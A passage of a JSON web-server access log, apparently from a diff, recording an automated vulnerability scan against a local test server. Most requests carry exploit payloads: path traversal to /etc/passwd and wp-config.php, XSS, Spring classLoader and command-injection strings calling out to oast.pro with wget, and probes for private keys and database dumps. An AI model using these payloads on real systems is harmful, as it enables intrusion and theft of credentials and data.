(Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=ca28bc0smpvbbtig07h08atigzk1pyfpj.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"x_login=../../../wp-config","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /code?dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 29KBxbg3u2FLTP694yL8Yor2qQG\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /FileZilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=ca28bc0smpvbbtig07h0wrjgju4y3dzix.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://ca28bc0smpvbbtig07h0u8k9sffk6gszy.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ca28bc0smpvbbtig07h0aggpqehba1qw4.oast.pro)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /thruk/cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"127.0.0.1/thruk/cgi-bin/login.cgi?thruk", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://ca28bc0smpvbbtig07h083a9mj8me6y9g.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:04 